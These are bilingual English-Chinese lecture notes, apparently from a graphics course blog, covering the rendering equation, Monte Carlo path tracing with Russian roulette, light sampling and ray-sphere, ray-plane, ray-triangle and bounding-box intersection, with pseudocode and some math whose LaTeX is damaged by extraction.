    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_r(x^{\prime},-\omega_i)f(x,\omega_i,\omega_r)\cos\theta_id\omega_i$$

    ​要是能看到一个物体,要么它自身能发光,要么它能反射出其它光源发出的光。

    Is a Fredholm Integral Equation of second kind [extensively studied numerically] with canonical form

    ​是具有规范形式的第二类 Fredholm 积分方程 [经过广泛的数值研究]

    $$l(u)=e(u)+\int l(v)K(u,v)dv$$

    ​$K(u,v)dv$$ 是 Kernel of equation Light Transport Operator.

    $$L=E+KL$$

    Can be discretized to a simple matrix equation [or system of simultaneous linear equations] ($L$, $E$ are vectors, $K$ is the light transport matrix)

    ​可以离散化为一个简单的矩阵方程[或联立线性方程组]($L$、$E$为向量,$K$为光传输矩阵)


    Ray Tracing and extensions

    ​光线追踪和扩展

    • General class numerical Monte Carlo methods

      通用类数值蒙特卡罗方法

    • Approximate set of all paths of light in scene

      场景中所有光路的近似集

    $$\begin{aligned}L&=E+KL\IL-KL&=E\(I-K)L&=E\L&=(I-K)^{-1}E\end{aligned}$$

    ​在矩阵运算中,$(I-K)^{-1}$ 有类似泰勒公式一样的性质:Binomial Theorem 二项式定理

    $$\begin{aligned}
    L&=(1+K+K2+K3+…)E \
    L&=E+KE+K2E+K3E+…
    \end{aligned}$$

    • $E$

      Emission directly From light sources

      直接从光源发射

    • $KE$

      Direct Illumination on surfaces

      表面直接照明

    • $K^2E$

      Indirect Illumination (One bounce indirect) [Mirrors, Refraction]

      间接照明(一次间接反射)[镜子、折射]

    • $K^3E$

      (Two bounce indirect illum.)

      (两次反射间接照明。)

    如果只取 $L=E+KE$,则我们可以视为 Shading in Rasterization 光栅化中的着色

    png

    ​Direct illumination 不计算反射,背光面将会一片漆黑。

    ​计算的反射越多,画面越真实,也会越亮,但不会无限变亮。


    Probability Review

    Random Variables

    ​随机变量

    $X$ random variable. Represents a distribution of potential values

    ​随机变量。表示潜在值的分布

    $X\sim p(x)$ probability density function (PDF). Describes relative probability of a random process choosing value

    ​概率密度函数(PDF)。描述随机过程选择值的相对概率

    Example: uniform PDF: all values over a domain are equally likely

    ​示例:均匀密度函数:域内的所有值都具有相同的可能性

    png

    ​示例:扔骰子

    $X$ takes on values $1, 2, 3, 4, 5, 6$

    $p(1)=p(2)=p(3)=p(4)=p(5)=p(6)$


    Probabilities

    ​概率

    png

    $n$ discrete values $x_i$ with probability $p_i$

    ​$n$ 个离散值 $x_i$ 具有概率 $p_i$

    Requirements of a probability distribution:

    ​概率分布的要求:

    $p_i\ge 0$

    $\sum^n_{i=1}p_i=1$

    Six-sided die example 六面骰子示例:$p_i=\frac{1}{6}$


    Expected Value of a Random Variable

    ​随机变量的期望值

    The average value that one obtains if repeatedly drawing samples from the random distribution.

    ​从随机分布中反复抽取样本所获得的平均值。

    Expected value of $X$:$E[X]=\sum_{i=1}^{n}x_{i}p_{i}$

    Die example: $\begin{aligned}E[X]&=\sum_{i=1}^n\frac{i}{6}\&=(1+2+3+4+5+6)/6=3.5\end{aligned}$


    Continuous Case: Probability Distribution Function (PDF)

    ​连续情况:概率分布函数 (PDF)

    png

    $$X\sim p(x)$$

    A random variable $X$ that can take any of a continuous set of values, where the relative probability of a particular value is given by a continuous probability density function $p(x)$.

    ​随机变量 $X$ 可以取一组连续的值中的任意一个,其中特定值的相对概率由连续概率密度函数 $p(x)$ 给出。

    Conditions on $p(x)$: $\begin{aligned}p(x)\geq0\ \mathrm{and}\int p(x)\text dx=1\end{aligned}$

    Expected value of $X$: $E[X]=\int xp(x)dx$

    Lecture 16 Ray Tracing 4 (Monte Carlo Path Tracing)

    Monte Carlo Integration

    Why: we want to solve an integral, but it can be too difficult to solve analytically.

    ​原因:我们想解一个积分,但用分析方法(牛顿莱布尼茨公式)解太难了。

    What & How: estimate the integral of a function by averaging random samples of the function’ s value.

    ​内容和方法:通过对函数值的随机样本求平均值来估计函数的积分。

    png

    Let us define the Monte Carlo estimator for the definite integral of given function $f(x)$

    ​让我们为给定函数 $f(x)$ 的定积分定义蒙特卡洛估计量

    Definite integral 定积分:$\int_a^bf(x)dx$

    Random variable 随机变量:$X_i\sim p(x)$

    Monte Carlo estimator 蒙特卡洛估计量:$F_N=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}$


    Example: Uniform Monte Carlo Estimator

    ​示例:统一蒙特卡罗估计量

    Uniform random variable 对于均匀随机变量:

    png

    png

    $\begin{aligned}&X_i\sim p(x)=C \&\begin{aligned}\int_a^bp(x)dx=1\end{aligned} \&\Rightarrow \begin{aligned}\int_a^bCdx=1\end{aligned} \&\Rightarrow \begin{aligned}C=\frac{1}{b-a}\end{aligned} \end{aligned}$

    Uniform random variable 均匀随机变量:$X_i\sim p(x)=\frac1{b-a}$

    Basic Monte Carlo estimator 基本蒙特卡罗估计量:$F_N=\frac{b-a}N\sum_{i=1}^Nf(X_i)$


    Monte Carlo Integration

    ​蒙特卡罗积分

    $$\begin{aligned}\int f(x)\mathrm{d}x&=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}\quad&X_i\sim p(x)\end{aligned}$$

    Some notes:

    一些注意事项:

    • The more samples, the less variance.

      样本越多,方差越小。

    • Sample on $x$, integrate on $x$.

      在 $x$ 上采样,在 $x$ 上积分。

    Path Tracing

    ​路径追踪

    Motivation: Whitted-Style Ray Tracing

    ​动机:Whitted 式光线追踪

    Whitted-style ray tracing:

    ​Whitted 式光线追踪:

    • Always perform specular reflections / refractions

      始终执行镜面反射/折射

    • Stop bouncing at diffuse surfaces

      停止在漫反射表面反弹

    Are these simplifications reasonable?

    ​这些简化合理吗?

    High level: let’ s progressively improve upon Whitted-Style Ray Tracing and lead to our path tracing algorithm!

    ​高层次:让我们逐步改进 Whitted 风格的光线追踪并引出我们的路径追踪算法!


    Whitted-Style Ray Tracing: Problem 1

    ​Whitted 式光线追踪:问题 1

    Where should the ray be reflected for glossy materials?

    ​对于光泽材质来说,射线应该在哪里反射?

    png

    ​应为 Glossy reflection,物体接受光和其它物体反射过来的光。


    No reflections between diffuse materials?

    ​漫反射材质之间没有反射吗?

    png

    ​应为右边,物体(如长方体)接受光和其它物体反射(如红墙壁)过来的光。


    Whitted-Style Ray Tracing is Wrong

    ​Whitted 式光线追踪是错误的

    But the rendering equation is correct

    ​但渲染方程是正确的

    $$L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    But it involves

    ​但它涉及

    • Solving an integral over the hemisphere, and

      求解半球上的积分,以及

    • Recursive execution

      递归执行

    How do you solve an integral numerically?

    ​如何用数值方法求解积分?


    A Simple Monte Carlo Solution

    ​简单的蒙特卡罗解决方案

    Suppose we want to render one pixel (point) in the following scene for direct illumination only

    ​假设我们想在以下场景中渲染一个像素(点),仅用于直接照明

    Note: this is an area light

    png

    Abuse the concept of Reflection Equation a little bit

    ​稍微滥用一下反射方程的概念

    $$L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    (again, we assume all directions are pointing outwards)

    ​(再次假设所有方向都指向外面)

    Fancy as it is, it’ s still just an integration over directions

    ​尽管很花哨,但它仍然只是对方向的整合

    png

    So, of course we can solve it using Monte Carlo integration!

    ​因此,我们当然可以使用蒙特卡洛积分来解决这个问题!

    We want to compute the radiance at $p$ towards the camera

    ​我们想要计算 $p$ 处朝向相机的辐射度

    $$\begin{aligned}L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm d\omega_i\end{aligned}$$

    Monte Carlo integration:

    ​蒙特卡洛积分:

    $$\int_abf(x)\mathrm{d}x\approx\frac1N\sum_{k=1}N\frac{f(X_k)}{p(X_k)}\quad X_k\sim p(x)$$

    What’ s our “$f(x)$”?

    $$L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$$

    What’ s our pdf?

    $$p(\omega_i)=1/2\pi$$

    (assume uniformly sampling the hemisphere)

    ​(假设对半球进行均匀采样)

    So, in general

    $$\begin{aligned}
    L_o(p,\omega_o)& \begin{aligned}=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm d\omega_i\end{aligned} \
    &\approx\frac1N\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}
    \end{aligned}$$

    (note: abuse notation a little bit for $i$)

    ​(注意:对 $i$ 的符号有点滥用)

    What does it mean?

    ​这是什么意思?

    A correct shading algorithm for direct illumination!

    ​直接照明的正确着色算法!

    $$L_o(p,\omega_o)\approx\frac{1}{N}\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}$$


    shade(p, wo)

    ​Randomly choose N directions wi~pdf

    ​Lo = 0.0

    ​For each wi

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)

    ​Return Lo


    Introducing Global Illumination

    ​全局照明简介

    One more step forward: what if a ray hits an object?

    png

    $Q$ also reflects light to $P$! How much? The dir. illum. at $Q$!

    ​$Q$ 也反射光到 $P$!反射了多少?$Q$ 处的方向光!


    shade(p, wo)

    ​Randomly choose N directions wi~pdf

    ​Lo = 0.0

    ​For each wi

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)

    ​Else If ray r hit an object at q

    ​Lo += (1 / N) * shade(q, -wi) * f_r * cosine / pdf(wi)

    ​Return Lo


    Path Tracing

    ​路径追踪

    Problem 1: Explosion of #rays as #bounces go up:

    png

    ​光线经过几次反射,所产生的光线数量就过多了,显卡就算不过来了。

    From now on, we always assume that only 1 ray is traced at each shading point:

    ​从现在开始,我们始终假设每个着色点只追踪 1 条射线:


    shade(p, wo)

    ​Randomly choose ONE direction wi~pdf(w) // 不用 for 循环了

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Return L_i * f_r * cosine / pdf(wi)

    ​Else If ray r hit an object at q

    ​Return shade(q, -wi) * f_r * cosine / pdf(wi)


    This is path tracing! (FYI, Distributed Ray Tracing if $N \ne 1$)

    ​这是路径追踪! (仅供参考,如果 $N\ne 1$,则为分布式光线追踪)


    Ray Generation

    ​射线生成

    png

    But this will be noisy!

    ​但是这样会产生很多噪声!

    No problem, just trace more paths through each pixel and average their radiance!

    ​但这样会很吵!没问题,只需在每个像素上追踪更多路径并平均它们的辐射度!


    Very similar to ray casting in ray tracing

    ​与光线追踪中的光线投射非常相似


    ray_generation(camPos, pixel)

    ​Uniformly choose N sample positions within the pixel

    ​pixel_radiance = 0.0

    ​For each sample in the pixel

    ​Shoot a ray r(camPos, cam_to_sample)

    ​If ray r hit the scene at p

    ​pixel_radiance += 1 / N * shade(p, sample_to_cam)

    ​Return pixel_radiance


    Now are we good? Any other problems in shade()?


    shade(p, wo)

    ​Randomly choose ONE direction wi~pdf(w)

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Return L_i * f_r * cosine / pdf(wi)

    ​Else If ray r hit an object at q

    ​Return shade(q, -wi) * f_r * cosine / pdf(wi)


    Problem 2: The recursive algorithm will never stop! 递归算法,无限递归!


    ​如果人为限定光线反弹次数:

    Dilemma: the light does not stop bouncing indeed!

    ​困境:光线确实不会停止反弹!

    Cutting #bounces == cutting energy!

    ​减少反弹 == 减少能量!

    png

    png

    ​如此做,3 bounces 和 17 bounces 的亮度是不一样的。


    Solution: Russian Roulette (RR)

    ​解决方案:俄罗斯轮盘赌(RR)

    Russian Roulette is all about probability

    ​俄罗斯轮盘赌完全是概率游戏

    With probability $0 < P < 1$, you are fine

    ​概率 $0 < P < 1$,则没问题

    With probability $1 - P$, otherwise

    ​概率 $1 - P$,另外情况

    png

    Previously, we always shoot a ray at a shading point and get the shading result $L_o$

    ​以前,我们总是向着色点发射射线并得到着色结果 $L_o$

    Suppose we manually set a probability $P (0 < P < 1)$

    ​假设我们手动设置一个概率 $P (0 < P < 1)$

    With probability $P$, shoot a ray and return the shading result divided by $P$: $L_o / P$

    ​以概率 $P$,发射一条射线并返回除以 $P$ 的着色结果:$L_o / P$

    With probability $1-P$, don’ t shoot a ray and you’ ll get $0$

    ​以概率 $1-P$,不发射射线,您将得到 $0$

    In this way, you can still expect to get $L_o$! :

    ​这样,您仍然可以期望得到 $L_o$!:

    $E = P \cdot (L_o / P) + (1 - P) \cdot 0 = L_o$


    shade(p, wo)

    Manually specify a probability P_RR

    Randomly select ksi in a uniform dist. in [0, 1]

    If (ksi > P_RR) return 0.0;

    ​Randomly choose ONE direction wi~pdf(w)

    ​Trace a ray r(p, wi)

    ​If ray r hit the light

    ​Return L_i * f_r * cosine / pdf(wi) / P_RR

    ​Else If ray r hit an object at q

    ​Return shade(q, -wi) * f_r * cosine / pdf(wi) / P_RR


    Now we already have a correct version of path tracing!

    ​现在我们已经有了正确版本的路径追踪!

    But it’ s not really efficient.

    ​但它并不是很高效。

    png


    Sampling the Light

    ​光采样

    Understanding the reason of being inefficient

    ​了解效率低下的原因

    png

    there will be 1 ray hitting the light. So a lot of rays are “wasted” if we uniformly sample the hemisphere at the shading point.

    ​会有 1 条射线击中光源。因此,如果我们在着色点处均匀采样半球,则很多射线都会被“浪费”。


    Sampling the Light (pure math)

    ​光采样(纯数学)

    png

    Monte Carlo methods allows any sampling methods, so we can sample the light (therefore no rays are “wasted”)

    ​蒙特卡罗方法允许任何采样方法,因此我们可以对光进行采样(因此不会“浪费”任何光线)

    Assume uniformly sampling on the light:

    ​假设对光进行均匀采样:

    $\text{pdf} = 1 / A (\text{because} \int\text{pdf d}A = 1)$

    But the rendering equation integrates on the solid angle 但渲染方程在立体角上积分: $L_o = \int L_i fr \cos d\omega$.

    Recall Monte Carlo Integration

    ​回想一下蒙特卡罗积分:

    Sample on $x$ & integrate on $x$

    ​在 $x$ 上采样并在 $x$ 上积分

    Since we sample on the light, can we integrate on the light?

    ​由于我们在光上采样,我们可以在光上积分吗?

    Need to make the rendering equation as an integral of $\text dA$

    ​需要将渲染方程作为 $\text dA$ 的积分

    Need the relationship between $\text d\omega$ and $\text dA$

    ​需要 $\text d\omega$ 和 $\text d A$ 之间的关系

    Easy! Recall the alternative def. of solid angle:

    ​简单!回想一下立体角的另一种定义:

    Projected area on the unit sphere

    ​单位球面上的投影面积

    $$d\omega=\frac{dA\cos\theta{\prime}}{|x{\prime}-x|^2}$$

    Then we can rewrite the rendering equation as

    ​然后我们可以将渲染方程重写为

    $$\begin{aligned}
    L_o(x,\omega_o)& \begin{aligned}=\int_{\Omega^+}L_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\cos\theta\mathrm d\omega_i\end{aligned} \
    &\begin{aligned}&=\int_AL_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\frac{\cos\theta\cos\theta’}{|x’-x|^2}\mathrm dA\end{aligned}
    \end{aligned}$$

    Now an integration on the light!

    ​现在对光进行积分!

    Monte Carlo integration:

    ​蒙特卡洛积分:

    “$f(x)$”: everything inside 里面的一切

    $\text{Pdf}: 1 / A$

    png

    Previously, we assume the light is “accidentally” shot by uniform hemisphere sampling

    ​之前,我们假设光线是“意外地”通过均匀半球采样射出的

    Now we consider the radiance coming from two parts:

    ​现在我们考虑来自两部分的辐射:

    1. light source (direct, no need to have RR)

      光源(直接,不需要 RR)

    2. other reflectors (indirect, RR)

      其他反射器(间接,RR)


    shade(p, wo)

    ​# Contribution from the light source.

    Uniformly sample the light at x’ (pdf_light = 1 / A)

    ​L_dir = L_i * f_r * cos θ * cos θ’ / |x’ - p|^2 / pdf_light

    ​# Contribution from other reflectors.

    ​L_indir = 0.0

    ​Test Russian Roulette with probability P_RR

    Uniformly sample the hemisphere toward wi (pdf_hemi = 1 / 2pi)

    ​Trace a ray r(p, wi)

    ​If ray r hit a non-emitting object at q

    ​L_indir = shade(q, -wi) * f_r * cos θ / pdf_hemi / P_RR

    ​Return L_dir + L_indir


    One final thing: how do we know if the sample on the light is not blocked or not?

    ​最后一件事:我们如何知道光上的样本是否被遮挡?

    png


    # Contribution from the light source.

    L_dir = 0.0

    Uniformly sample the light at x’ (pdf_light = 1 / A)

    Shoot a ray from p to x’

    If the ray is not blocked in the middle

    ​L_dir = …


    Now path tracing is finally done!


    Some Side Notes

    ​一些补充说明

    • Path tracing (PT) is indeed difficult

      路径追踪 (PT) 确实很难

      • Consider it the most challenging in undergrad CS

        认为它是本科计算机科学中最具挑战性的

      • Why: physics, probability, calculus, coding

        原因:物理、概率、微积分、编码

      • Learning PT will help you understand deeper in these

        学习 PT 将帮助您更深入地理解这些

    • Is it still “Introductory”?

      它仍然是“入门级”吗?

      • Not really, but it’s “modern" :)

        不是,但它是“现代” :)

      • And so learning it will be rewarding also because …

        因此学习它也会很有价值,因为……


    Is Path Tracing Correct?

    ​Yes, almost 100% correct, a.k.a. PHOTO-REALISTIC

    ​是的,几乎 100% 正确,又名照片级真实感

    png


    Ray tracing: Previous vs. Modern Concepts

    ​光线追踪:过去与现代概念

    • Previous

      早期

      • Ray tracing == Whitted-style ray tracing

        光线追踪 == Whitted 式光线追踪

    • Modern (my own definition)

      现代(我自己的定义)

      • The general solution of light transport, including

        光传输的一般解决方案,包括

      • (Unidirectional & bidirectional) path tracing

    (单向和双向)路径追踪

    • Photon mapping

      光子映射

    • Metropolis light transport

      Metropolis 光传输

    • VCM / UPBP…


    Things we haven’ t covered / won’ t cover

    ​我们没有涉及/不会涉及的内容

    • Uniformly sampling the hemisphere

      均匀采样半球

      • How? And in general, how to sample any function? (sampling)

        如何采样?一般来说,如何采样任何函数? (采样)

    • Monte Carlo integration allows arbitrary pdfs

      蒙特卡罗积分允许任意 pdf

      • What’s the best choice? (importance sampling)

        最佳选择是什么? (重要性采样)

    • Do random numbers matter?

      随机数重要吗?

      • Yes! (low discrepancy sequences)

        是的! (低差异序列)

    • I can sample the hemisphere and the light

      我可以对半球和光线进行采样

      • Can I combine them? Yes! (multiple imp. sampling)

        我可以将它们结合起来吗?是的!(多重采样)

    • The radiance of a pixel is the average of radiance on all
      paths passing through it

      像素的辐射度是通过它的所有路径的辐射度的平均值

      • Why? (pixel reconstruction filter)

        为什么?(像素重建滤波器)

    • Is the radiance of a pixel the color of a pixel?

      像素的辐射度是像素的颜色吗?

      • No. (gamma correction, curves, color space)

        不是。(伽马校正、曲线、色彩空间)

    • Asking again, is path tracing still “Introductory”?

      再次询问,路径追踪仍然是“入门级”吗?

      • This time, yes. Fear the science, my friends.

        这次是的。朋友们,敬畏科学吧。

    ]]>
    + 资源

    课程

    Lecture 13: Ray Tracing 1 (Whitted-Style Ray Tracing)

    Why Ray Tracing?

    png

    Soft shadows

    ​软阴影

    Glossy reflection

    ​光泽反射

    Indirect illumination

    ​间接照明

    • Rasterization couldn’ t handle global effects well

    光栅化无法很好地处理全局效果

    • (Soft) shadows

    (软)阴影

    • And especially when the light bounces more than once

      尤其是当光线反弹不止一次时


    png

    Rasterization is fast, but quality is relatively low

    ​光栅化速度快,但质量相对较低

    ​早期的游戏看上去画质不好,因为这个游戏的地图太大了,为了保证性能只得牺牲画质。


    png

    ​不需要实时渲染的任务下,光线追踪可以渲染出很好的效果。

    • Ray tracing is accurate, but is very slow

      光线追踪很精确,但速度很慢

      • Rasterization: real-time, ray tracing: offline

        光栅化:实时,光线追踪:离线

      • ~10K CPU core hours to render one frame in production

        在生产中渲染一帧图像需要 ~10K CPU 核心小时

    Basic Ray-Tracing Algorithm

    Light Rays

    ​光线

    Three ideas about light rays

    关于光线的三种观点

    1. Light travels in straight lines (though this is wrong)

      光是直线传播的(尽管这是错误的)

    2. Light rays do not “collide” with each other if they cross (though this is still wrong)

      光线交叉时不会相互 “碰撞”(尽管这仍然是错误的)

    3. Light rays travel from the light sources to the eye (but the physics is invariant under path reversal-reciprocity).

      光线从光源到眼睛传播(但物理规律在路径反向-互易性下保持不变)

    “And if you gaze long into an abyss, the abyss also gazes into you.” — Friedrich Wilhelm Nietzsche (translated)

    ​当你在凝视深渊时,深渊也在凝视你。


    Emission Theory of Vision

    ​视觉发射理论。认为人之所以能够看到东西,是因为人眼发出的射线投射到了相应的物体上。虽然这是错误的,但我们可以从中得到启发。

    png

    “For every complex problem there is ananswer that is clear, simple, and wrong.”——H.L.Mencken

    ​每一个复杂的问题都有一个清晰、简单和错误的答案。


    Ray Casting

    ​射线投射

    png

    1. Generate an image by casting one ray per pixel

      通过为每个像素投射一条光线生成图像

    2. Check for shadows by sending a ray to the light

      通过向光源发送光线检查阴影


    Ray Casting - Generating Eye Rays

    ​从眼睛处发出射线

    Pinhole Camera Model

    ​针孔摄像机模型

    png

    ​从眼睛处发射射线,射线第一个打到的物体即为观察到的物体。


    Ray Casting - Shading Pixels (Local Only)

    ​给像素着色

    png

    ​所看到的点与光照方向,物体法线,材质等参数,就可以计算出观察到的像素的颜色。


    Recursive (Whitted-Style) Ray Tracing

    ​递归(怀特式)光线追踪。比之前的光线追踪算法还要高级一点。

    png

    “An improved Illumination model for shaded display” T. Whitted, CACM 1980

    Time:

    • VAX 11/780 (1979) 74m

      当时渲染了 74 分钟。

    • PC (2006) 6s

    • GPU (2012) 1/30s


    png

    ​眼睛发出的射线还会再反射到其他面上。


    png

    ​还有可能产生折射。


    png

    ​这些打到物体上的点再计算光照,如果中间有阻挡,则视为阴影部分。

    Ray-Surface Intersection

    ​射线-表面交点。现在该研究射线在表面上的交点是如何计算的。

    png

    Ray is defined by its origin and a direction vector

    ​射线由其原点 $\mathbf{o}$ 和方向矢量 $\mathbf d$ 定义

    Ray equation:

    png

    ​用射线发出的时间 $t$ 来定义这个射线:

    $$\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\quad0\leq t<\infty $$


    Ray Intersection With Sphere

    ​射线与球面的交点

    Ray: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\mathrm{}0\leq t<\infty $

    Sphere: $\mathbf p:(\mathbf p-\mathbf c)2-R2=0$

    What is an intersection?

    ​什么是交点?

    The intersection $\mathbf p$ must satisfy bothray equation and sphere equation

    ​交点 $\mathbf p$ 必须同时满足射线方程和球面方程,联立两个方程即可。

    png

    Solve for intersection:

    $$(\mathbf{o}+t\mathbf{~d}-\mathbf{c})2-R2=0$$

    png

    $\begin{aligned}
    &at^2+bt+c=0,\text{ where} \
    &a=\mathbf{d}\cdot\mathbf{d} \
    &b=2(\mathbf{o}-\mathbf{c})\cdot\mathbf{d} \
    &\begin{aligned}c=(\mathbf{o}-\mathbf{c})\cdot(\mathbf{o}-\mathbf{c})-R^2\end{aligned} \
    &\begin{aligned}t=\frac{-b\pm\sqrt{b^2-4ac}}{2a}\end{aligned}
    \end{aligned}$

    ​就是一元二次方程求解了。


    Ray Intersection With Implicit Surface

    Ray 射线方程: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\mathrm{}0\leq t<\infty$

    General implicit surface 一般隐式曲面: $\mathbf{p}:f(\mathbf{p})=0$

    Substitute ray equation 将射线方程代入: $f(\mathbf{o}+t\mathbf{d})=0$

    Solve for real, positive roots 求解实数正根:

    png

    ​对于这样的参数方程,对于计算机来说求解很容易!


    Ray Intersection With Triangle Mesh

    ​但是一般都用多边形面来表示一个几何,如何计算?

    png

    Why?

    • Rendering: visibility, shadows, lighting…

      渲染:可见度、阴影、 光照…

    • Geometry: inside/outside test

      几何:内部/外部测试

    How to compute?

    ​如何计算?

    Let’ s break this down:

    ​让我们来分析一下:

    • Simple idea: just intersect ray with each triangle

      简单的想法:只需将射线与每个三角形相交即可

    • Simple, but slow (acceleration?)

      简单,但速度慢(加速?)

    • Note: can have 0, 1 intersections (ignoring multiple intersections)

      注意:可以有 0 个、1 个交点 (忽略多个交点)


    Ray Intersection With Triangle

    png

    Triangle is in a plane

    ​三角形位于平面内

    • Ray-plane intersection

      射线与平面相交

    • Test if hit point is inside triangle

      测试命中点是否位于三角形内

    Many ways to optimize…

    ​优化方法有很多…


    Plane Equation

    ​平面方程

    Plane is defined by normal vector and a point on plane

    ​平面由法向量和平面上的一个点定义

    Example:

    png

    Plane Equation (if $p$ satisfies it, then $p$ is on the plane):

    ​平面方程(若 $p$ 满足该方程,则 $p$ 在平面上):

    png


    Ray Intersection With Plane

    Ray equation: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},0\leq t<\infty $

    Plane equation: $\mathbf{p}:(\mathbf{p}-\mathbf{p}^{\prime})\cdot\mathbf{N}=0$

    Solve for intersection: 将两个方程联立,求解

    $\text{Set }\mathbf{p}=\mathbf{r}(t)\text{ and solve for }t$

    $\mathbf{(p-p^{\prime})\cdot N=(o+td-p^{\prime})\cdot N=0}$

    $\begin{aligned}t&=\frac{(\mathbf{p’-o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}&\textsf{Check: }0\leq t<\infty\end{aligned}$


    Möller Trumbore Algorithm

    A faster approach, giving barycentric coordinate directly

    ​一种更快的方法(判断射线是否经过三角形面),直接给出重心坐标

    Recall: How to determine if the “intersection” is inside the triangle?

    ​回想一下:如何确定“交点”是否在三角形内部?

    $$\vec{\mathbf{O}}+t\vec{\mathbf{D}}=(1-b_1-b_2)\vec{\mathbf{P}}_0+b_1\vec{\mathbf{P}}_1+b_2\vec{\mathbf{P}}_2$$

    ​将射线打到平面上的点用三角形的重心坐标来表示。

    Hint: $(1-b_1-b_2), b_1, b_2$ are barycentric coordinates!

    ​提示:$(1-b_1-b_2),b_1,b_2$ 是重心坐标!

    $$\begin{bmatrix}t\b_1\b_2\end{bmatrix}=\frac1{\vec{\mathbf{S}}_1\bullet\vec{\mathbf{E}}_1}\begin{bmatrix}\vec{\mathbf{S}}_2\bullet\vec{\mathbf{E}}_2\\vec{\mathbf{S}}_1\bullet\vec{\mathbf{S}}\\vec{\mathbf{S}}_2\bullet\vec{\mathbf{D}}\end{bmatrix}$$

    $\text{Cost}=(1 \text{div}, 27 \text{mul} ,17 \text{add})$

    ​需要 1 次除,27 次乘,17 次加。

    Accelerating Ray-Surface Intersection

    ​加速计算射线-表面交点的方法

    Ray Tracing – Performance Challenges

    Simple ray-scene intersection

    ​简单的光线场景交点

    • Exhaustively test ray-intersection with every triangle

      详尽地测试每个三角形的光线交点

    • Find the closest hit (i.e. minimum $t$)

      找到最接近的命中点(即最小 $t$)

    Problem:

    ​问题:

    • Naive algorithm = #pixels ⨉ # traingles (⨉ #bounces)

      简单算法 = #像素 ⨉ #三角形(⨉ #反射)

    • Very slow!

      非常慢!

    For generality, we use the term objects instead of triangles later (but doesn’ t necessarily mean entire objects)

    ​非常慢!为了通用,我们稍后使用术语对象而不是三角形(但并不一定意味着整个对象)

    png

    png

    ​像这几个超过一千多个面了,要是这么渲染的话性能太差了。

    Bounding Volumes

    png

    Quick way to avoid intersections: bound complex object with a simple volume

    ​避免上面计算相交的快速方法:用简单体积绑定复杂物体

    • Object is fully contained in the volume

      物体完全包含在包围盒中

    • If it doesn’ t hit the volume, it doesn’ t hit the object

      如果射线没有击中包围盒,它就不会击中物体,就不用后续计算。优化性能

      如果击中了,再老老实实计算吧。

    • So test BVol first, then test object if it hit

      因此,首先测试 BVol,然后测试物体是否击中


    Ray-Intersection With Box

    ​射线与盒子的相交

    Understanding: box is the intersection of 3 pairs of slabs

    ​理解:包围盒是三个平面的相交部分。

    png

    Specifically:

    ​具体来说:

    We often use an Axis-Aligned Bounding Box (AABB)

    ​我们经常使用轴对齐包围盒 (AABB)

    i.e. any side of the BB is along either $x$, $y$, or $z$ axis

    ​即 BB 的任何一侧都沿着 $x$、$y$ 或 $z$ 轴


    Ray Intersection with Axis-Aligned Box

    png

    ​2D 空间中,计算射线在 $\mathrm x_0$ 和 $\mathrm x_1$ 的交点,得到一段线段。再$\mathrm y_0$ 和 $\mathrm y_1$ 的交点,得到另一段线段。两条线段取交集即为射线在包围盒中的范围。

    2D example; 3D is the same! Compute intersections with slabs and take intersection of $t_{min}/t_{max}$ intervals.

    ​2D 示例;3D 也一样!计算与板块的交点并取 $t_{min}/t_{max}$ 间隔的交点

    How do we know when the ray intersects the box?

    ​我们如何知道射线何时与盒子相交?


    • Recall: a box (3D) = three pairs of infinitely large slabs

      回想一下:一个盒子(3D)= 三对无限大的平板

    • Key ideas

      关键思想

      • The ray enters the box only when it enters all pairs of slabs

        只有当射线进入所有平板对时,它才会进入盒子

      • The ray exits the box as long as it exits any pair of slabs

        只要射线离开任何一对平板,它就会离开盒子

    • For each pair, calculate the $t_{\text{min}}$ and $t_\text{max}$ (negative is fine)

      对于每一对,计算 $t_{\text{min}}$ 和 $t_\text{max}$(负数也可以)

    • For the 3D box, $t_{\text{enter}} = \max{t_{\text{min}}}, t_{\text{exit}} = \min{t_{\text{max}}}$

      对于 3D 盒子,$t_{\text{enter}} = \max{t_{\text{min}}},t_{\text{exit}} = \min{t_{\text{max}}}$

    • If $t_{\text{enter}} < t_{\text{exit}}$, we know the ray stays a while in the box
      (so they must intersect!)

      如果 $t_{\text{enter}} < t_{\text{exit}}$,我们知道射线会在盒子中停留一段时间(所以它们一定相交!)


    • However, ray is not a line

      但是,射线不是直线

      • Should check whether $t$ is negative for physical correctness!
      • 应检查 $t$ 是否为负数以确保物理正确性!
    • What if $t_\text{exit} < 0$?

      • The box is “behind” the ray — no intersection!

        盒子在射线“后面” ——没有相交!

    • What if $t_{\text{exit}} \ge 0$ and $t_{text{enter}} < 0$?

      • The ray’ s origin is inside the box — have intersection!

        线的原点在盒子内部 — 有相交!

